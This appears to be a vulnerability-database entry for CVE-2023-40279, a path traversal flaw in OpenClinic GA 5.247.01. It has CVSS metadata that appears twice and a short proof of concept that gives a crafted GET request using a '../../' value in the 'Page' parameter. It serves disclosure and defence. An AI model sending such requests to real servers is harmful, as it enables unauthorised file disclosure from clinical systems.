CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
61.6%
# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40279
# Details
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.
# Proof of Concept (POC)
Steps to Reproduce:
- Crafting the Malicious GET Request:
- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):
GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host: 192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0
2. Confirming the Vulnerability:
- Send the crafted GET request to the target server.
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
- This vulnerability can lead to sensitive information disclosure or more severe attacks.
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
61.6%